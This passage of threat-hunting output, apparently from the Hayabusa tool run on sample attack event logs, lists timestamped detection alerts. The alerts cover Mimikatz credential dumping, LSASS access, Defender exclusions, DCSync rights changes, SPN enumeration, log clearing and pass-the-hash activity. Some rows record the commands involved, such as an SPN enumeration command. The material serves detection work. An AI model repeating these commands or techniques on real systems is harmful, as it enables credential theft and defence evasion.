Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx -2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair 
Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process 
Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true 
/low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: 
technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx -2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx -2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account 
manipulation/ID4738-User set with reversible psw encryption.evtx -2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx -2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx -2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx -2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx -2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx -2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx -2021-02-23 08:07:21.231 
+09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx -2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
-2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx -2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx -2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx -2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx -2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The 
Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx -2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 